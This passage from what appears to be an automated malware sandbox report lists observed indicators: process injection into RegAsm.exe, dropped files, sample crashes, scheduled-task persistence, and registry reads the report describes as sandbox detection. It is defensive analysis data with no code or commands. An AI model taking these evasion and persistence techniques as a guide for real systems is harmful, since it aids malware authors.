PID 6024 set thread context of 5184 | 6024 | JDSG3.exe | RegAsm.exe
PID 6800 set thread context of 5324 | 6800 | BVNMXCGHJ7.exe | RegAsm.exe
PID 1696 set thread context of 6896 | 1696 | JDSDS4.exe | RegAsm.exe
PID 1432 set thread context of 4268 | 1432 | InstallUtil.exe | AddInProcess.exe
PID 2352 set thread context of 4468 | 2352 | JDSG3.exe | RegAsm.exe
PID 4312 set thread context of 868 | 4312 | JDSDS4.exe | RegAsm.exe
PID 792 set thread context of 5564 | 792 | BVNMXCGHJ7.exe | RegAsm.exe
PID 2888 set thread context of 2460 | 2888 | JDSG3.exe | RegAsm.exe
PID 3636 set thread context of 6472 | 3636 | 60E0G7UKRntM1TQ.exe | 60E0G7UKRntM1TQ.exe
PID 3636 set thread context of 2208 | 3636 | 60E0G7UKRntM1TQ.exe | 60E0G7UKRntM1TQ.exe
PID 3636 set thread context of 4060 | 3636 | 60E0G7UKRntM1TQ.exe | 60E0G7UKRntM1TQ.exe
PID 3636 set thread context of 3932 | 3636 | 60E0G7UKRntM1TQ.exe | 60E0G7UKRntM1TQ.exe
-
Drops file in Program Files directory 64 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Program Files\7-Zip\Lang\sv.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\7z.sfx | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\History.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\fur.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\hr.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\ms.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\ne.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files (x86)\Common Files\Haandline\Erts\Angulately.Mar | Miljoeministeren.exe
File opened for modification | C:\Program Files\7-Zip\Lang\ku.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\lt.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\cs.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\ka.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\mng.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\ru.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\License.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\de.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\ps.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\readme.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\7-zip.chm | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\fi.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\tr.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files (x86)\Ssnrt\7no04fld0or5.exe | cmstp.exe
File opened for modification | C:\Program Files\7-Zip\Lang\co.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\gu.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\io.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\mr.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\ug.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\ar.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\fa.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\yo.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\zh-cn.txt | 60E0G7UKRntM1TQ.exe
File created | C:\Program Files (x86)\Ssnrt\7no04fld0or5.exe | Explorer.EXE
File opened for modification | C:\Program Files\7-Zip\Lang\is.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\sa.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\uk.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\7-zip.dll | 60E0G7UKRntM1TQ.exe
File created | C:\Program Files\7-Zip\7-zip.dll.tmp | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\en.ttt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\ko.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\si.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\tg.txt | 60E0G7UKRntM1TQ.exe
File created | C:\Program Files\7-Zip\Lang\tk.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\af.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\mng2.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\ro.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\sl.txt | 60E0G7UKRntM1TQ.exe
File created | C:\Program Files\7-Zip\Lang\sw.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\sw.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\va.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\eo.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\es.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\kk.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\lij.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\pt.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\ga.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\7zFM.exe | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\br.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\et.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\kab.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\mk.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\7zCon.sfx | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files\7-Zip\Lang\ky.txt | 60E0G7UKRntM1TQ.exe
File opened for modification | C:\Program Files (x86)\Gkdv\yx8pgdl0px.exe | Explorer.EXE
File opened for modification | C:\Program Files\7-Zip\Lang\az.txt | 60E0G7UKRntM1TQ.exe
-
Drops file in Windows directory 1 IoCs
Processes: Miljoeministeren.exe
description | ioc | process
File opened for modification | C:\Windows\Axiation\Stningernes\Hypotekforeningerne.ini | Miljoeministeren.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 15 IoCs
Processes: WerFault.exe
pid | pid_target | process | target process
6120 | 5008 | WerFault.exe | MNZXHA36.exe
3852 | 6072 | WerFault.exe | LKSJDSAKDQ.exe
6064 | 1784 | WerFault.exe | MNZXHA36.exe
6356 | 6540 | WerFault.exe | LKSJDSAKDQ.exe
4488 | 6540 | WerFault.exe | LKSJDSAKDQ.exe
6580 | 4332 | WerFault.exe | 7no04fld0or5.exe
6420 | 1372 | WerFault.exe | yx8pgdl0px.exe
5816 | 540 | WerFault.exe | tord.exe
5368 | 5948 | WerFault.exe | CRYPTED_BSI20221205.exe
4372 | 5336 | WerFault.exe | gntuud.exe
3392 | 4392 | WerFault.exe | gntuud.exe
6536 | 316 | WerFault.exe | gntuud.exe
2156 | 6224 | WerFault.exe | gntuud.exe
5224 | 2352 | WerFault.exe | 2611.exe
6408 | 2888 | WerFault.exe | gntuud.exe -
NSIS installer 12 IoCs
Processes:
resource | yara_rule
C:\Users\Admin\Downloads\alaat2.1.exe | nsis_installer_1
C:\Users\Admin\Downloads\alaat2.1.exe | nsis_installer_2
C:\Users\Admin\Downloads\alaat2.1.exe | nsis_installer_1
C:\Users\Admin\Downloads\alaat2.1.exe | nsis_installer_2
C:\Users\Admin\Downloads\makanaki.exe | nsis_installer_1
C:\Users\Admin\Downloads\makanaki.exe | nsis_installer_2
C:\Users\Admin\Downloads\makanaki.exe | nsis_installer_1
C:\Users\Admin\Downloads\makanaki.exe | nsis_installer_2
C:\Users\Admin\Downloads\jeymo2.1.exe | nsis_installer_1
C:\Users\Admin\Downloads\jeymo2.1.exe | nsis_installer_2
C:\Users\Admin\Downloads\jeymo2.1.exe | nsis_installer_1
C:\Users\Admin\Downloads\jeymo2.1.exe | nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes: ChromeSetup.exe, taskmgr.exe
description | ioc | process
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | ChromeSetup.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | ChromeSetup.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | ChromeSetup.exe -
Checks processor information in registry 2 TTPs 44 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes: rundll32.exe, InstallUtil.exe, file.exe, firefox.exe, build.exe, taskmgr.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | rundll32.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | InstallUtil.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | file.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | firefox.exe
Key value enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | rundll32.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1 | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | firefox.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | file.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | firefox.exe
Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | rundll32.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | firefox.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | build.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | taskmgr.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | taskmgr.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet | rundll32.exe
Key value enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | build.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | firefox.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | InstallUtil.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz | rundll32.exe -
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes: schtasks.exe
pid | process
2056 | schtasks.exe
5856 | schtasks.exe
5948 | schtasks.exe
4640 | schtasks.exe
5356 | schtasks.exe
6752 | schtasks.exe
1220 | schtasks.exe
3568 | schtasks.exe
5728 | schtasks.exe
3312 | schtasks.exe -
Delays execution with timeout.exe 3 IoCs
Processes: timeout.exe
pid | process
4880 | timeout.exe
5568 | timeout.exe
5664 | timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes: chromnius.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chromnius.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chromnius.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chromnius.exe -
Processes:
Explorer.EXEcmmon32.execmstp.exewlanext.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE Key created \Registry\User\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 cmmon32.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\IESettingSync Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE Key created \Registry\User\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 cmstp.exe Key created \Registry\User\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 wlanext.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE -
Modifies data under HKEY_USERS 2 IoCs
Processes: chromnius.exe
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | chromnius.exe
Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133147574023205411" | chromnius.exe -
Modifies registry class 64 IoCs
Processes:
Explorer.EXEsetup.exelinda5.exe60E0G7UKRntM1TQ.execrashreporter.exeOpenWith.exefirefox.exeOpenWith.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\.xht setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ChromniusHTM.WXVEMRSTIGYW5ZPQXNSLO4DCFE\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Chromnius\\Application\\chromnius.exe\" --single-argument %1" setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\.pdf\OpenWithProgids\ChromniusHTM.WXVEMRSTIGYW5ZPQXNSLO4DCFE setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\.xht\OpenWithProgids\ChromniusHTM.WXVEMRSTIGYW5ZPQXNSLO4DCFE setup.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\MRUListEx = 00000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings linda5.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\CLSID\{635EFA6F-08D6-4EC9-BD14-8A0FDE975159}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Chromnius\\Application\\109.0.5386.0\\notification_helper.exe\"" setup.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff Explorer.EXE Key created 
\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 60E0G7UKRntM1TQ.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\.htm\OpenWithProgids\ChromniusHTM.WXVEMRSTIGYW5ZPQXNSLO4DCFE setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" 60E0G7UKRntM1TQ.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Applications\crashreporter.exe crashreporter.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" 60E0G7UKRntM1TQ.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip 60E0G7UKRntM1TQ.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\CLSID setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ChromniusHTM.WXVEMRSTIGYW5ZPQXNSLO4DCFE\Application\ApplicationName = "Chromnius" setup.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Applications\crashreporter.exe\NoOpenWith = "0" crashreporter.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ChromniusHTM.WXVEMRSTIGYW5ZPQXNSLO4DCFE\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Chromnius\\Application\\chromnius.exe,0" setup.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 = 5000310000000000855517bb100041646d696e003c0009000400efbe0c551999855517bb2e00000077e10100000001000000000000000000000000000000093ff400410064006d0069006e00000014000000 Explorer.EXE Key created 
\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ChromniusHTM.WXVEMRSTIGYW5ZPQXNSLO4DCFE\DefaultIcon setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip 60E0G7UKRntM1TQ.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\MRUListEx = 00000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ChromniusHTM.WXVEMRSTIGYW5ZPQXNSLO4DCFE setup.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\.htm setup.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\CLSID\{635EFA6F-08D6-4EC9-BD14-8A0FDE975159}\LocalServer32\ServerExecutable = "C:\\Users\\Admin\\AppData\\Local\\Chromnius\\Application\\109.0.5386.0\\notification_helper.exe" setup.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ChromniusHTM.WXVEMRSTIGYW5ZPQXNSLO4DCFE\shell\open\command setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ChromniusHTM.WXVEMRSTIGYW5ZPQXNSLO4DCFE\AppUserModelId = "Chromnius.WXVEMRSTIGYW5ZPQXNSLO4DCFE" setup.exe Key created 
\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\.svg setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" 60E0G7UKRntM1TQ.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\.SLN\ = "SLN_auto_file" OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip 60E0G7UKRntM1TQ.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip 60E0G7UKRntM1TQ.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 = 84003100000000008555cabb1100444f574e4c4f7e3100006c0009000400efbe0c5519998555cabb2e0000007fe1010000000100000000000000000042000000000071127f0044006f0077006e006c006f00610064007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370039003800000018000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\CLSID\{635EFA6F-08D6-4EC9-BD14-8A0FDE975159}\LocalServer32 setup.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\.htm\OpenWithProgids setup.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\SLN_auto_file\shell OpenWith.exe Set value (str) 
